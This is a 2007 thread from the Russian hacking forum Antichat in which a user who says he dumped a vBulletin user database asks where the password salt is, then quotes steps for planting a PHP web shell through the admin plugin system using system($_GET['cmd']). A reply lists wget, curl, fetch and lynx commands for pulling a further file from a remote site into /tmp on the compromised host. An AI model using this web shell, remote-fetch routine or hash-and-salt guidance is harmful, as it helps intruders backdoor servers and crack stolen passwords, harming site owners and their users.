HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

vBulletin [db] Где соль?
  #1  
Старый 15.01.2007, 00:50
Krasti
Новичок
Регистрация: 28.12.2006
Сообщений: 8
С нами: 10194034

Репутация: 4
По умолчанию vBulletin [db] Где соль?

Может глупый вопрос, но что-то понять не могу. Вот сдамбил базу юзеров, получил примерно вот такую тему:
PHP код:
INSERT INTO vb_user VALUES('1','6','','0','Rich','6c507b8dd286d058e69a37436a751bde','2006-11-20','***@gmail.com','0','','','','','','2','Администратор','0','1127663100','0','1159464415','1163971905','1152297660','33','10','5','3','0','0','0','0','2135','','0000-00-00','-1','1','','0','0','','0','0','-1','0','0','p\\u','2','','2','1','1'); 
А соль здесь получается "p\\u", или что?

Добавил: И что бы новую тему не создавать, помгите пожалуйста.
Цитата:
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда
А какой камандой после этого можно будет залить шелл на хост (FreeBSD)?

Последний раз редактировалось Krasti; 15.01.2007 в 00:53..
 
Ответить с цитированием

  #2  
Старый 15.01.2007, 00:52
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
С нами: 10282956

Репутация: 380
По умолчанию

соль в булке состоит из 3 знаков, может в другой таблице
 
Ответить с цитированием

  #3  
Старый 15.01.2007, 00:55
Krasti
Новичок
Регистрация: 28.12.2006
Сообщений: 8
С нами: 10194034

Репутация: 4
По умолчанию

Цитата:
Сообщение от maxster  
соль в булке состоит из 3 знаков, может в другой таблице
Лучше от этого мне не стало. Кстати во второй базе такая же тема, может что не так делаю? Да по другому вроде никак.

А может вообще в булке быть пароль без соли?
 
Ответить с цитированием

  #4  
Старый 15.01.2007, 00:58
злюка
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
С нами: 10787308

Репутация: 409
По умолчанию

да вот она "p\u"..просто первый символ "\" добавляется для экранирования некоторых символов (в данном случае "\"), который могут нарушить работу скрипта.

Последний раз редактировалось злюка; 15.01.2007 в 01:08..
 
Ответить с цитированием

  #5  
Старый 15.01.2007, 01:46
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию

Цитата:
А какой камандой после этого можно будет залить шелл на хост (FreeBSD)?
вбиваешь
which wget fetch curl links lynx
и смотришь какие качалки есть. в зависимости от этого вбиваешь нужное
Код:
- wget -o /tmp/file.c http://site.ru/file.c
- curl -o /tmp/file.c http://site.ru/file.c
- fetch -o /tmp/file.c http://site.ru/file.c
- lynx -source "http://site.ru/file.c" > /tmp/file.c
- links  -source "http://site.ru/file.c" > /tmp/file.c
- GET http://site.ru/file.c > /tmp/file.c
на примере ты скачиваешь с сайта site.ru файл file.с и сохраняешь его в папке /tmp
__________________
 
Ответить с цитированием

  #6  
Старый 15.01.2007, 08:40
Krasti
Новичок
Регистрация: 28.12.2006
Сообщений: 8
С нами: 10194034

Репутация: 4
По умолчанию

Цитата:
Сообщение от +toxa+  
вбиваешь
which wget fetch curl links lynx
и смотришь какие качалки есть. в зависимости от этого вбиваешь нужное
Код:
- wget -o /tmp/file.c http://site.ru/file.c
- curl -o /tmp/file.c http://site.ru/file.c
- fetch -o /tmp/file.c http://site.ru/file.c
- lynx -source "http://site.ru/file.c" > /tmp/file.c
- links  -source "http://site.ru/file.c" > /tmp/file.c
- GET http://site.ru/file.c > /tmp/file.c
на примере ты скачиваешь с сайта site.ru файл file.с и сохраняешь его в папке /tmp
Большое спасибо!
 
Ответить с цитированием

  #7  
Старый 15.01.2007, 02:03
злюка
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
С нами: 10787308

Репутация: 409
По умолчанию

Цитата:
Сообщение от Krasti  
Цитата:
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда
А какой камандой после этого можно будет залить шелл на хост (FreeBSD)?
собственно шелл ты мы уже получили, зачем еще один
 
Ответить с цитированием

  #8  
Старый 15.01.2007, 08:42
Krasti
Новичок
Регистрация: 28.12.2006
Сообщений: 8
С нами: 10194034

Репутация: 4
По умолчанию

Цитата:
Сообщение от злюка  
собственно шелл ты мы уже получили, зачем еще один
Я понимаю, что шелл есть, просто юзать такой шелл для меня труднова-то. Вот я и хочу залить шелл, который мне нравится. Кстати, спасибо за помощь.
 
Ответить с цитированием

  #9  
Старый 15.01.2007, 21:06
ReanimatoR
Участник форума
Регистрация: 27.08.2006
Сообщений: 223
С нами: 10371202

Репутация: 341
По умолчанию

вместо этого смд можешь спокойно заливать свой нормальный шелл!
 
Ответить с цитированием

  #10  
Старый 15.01.2007, 21:12
Krasti
Новичок
Регистрация: 28.12.2006
Сообщений: 8
С нами: 10194034

Репутация: 4
По умолчанию

Да я знаю, но работать он что-то отказывался. А смд пашет нормально.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
vBulletin v3.0.1. Стырил хэш, а вот как соль достать? GoreAD Уязвимости CMS / форумов 6 08.09.2010 14:28
Есть доступ в админку. Где находятся мд5 хеши юзверов? (vBulletin 3.0.8) stalles Уязвимости CMS / форумов 7 25.11.2006 20:36
Можно ли имея хеш и соль войти в админку не подбирая пароль? (Vbulletin 3.5.3) banall Уязвимости CMS / форумов 3 18.10.2006 14:43
Соль vBulletin Loading Уязвимости CMS / форумов 7 09.08.2006 16:56
Где скачать vBulletin Федя Болталка 1 31.07.2006 21:51



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.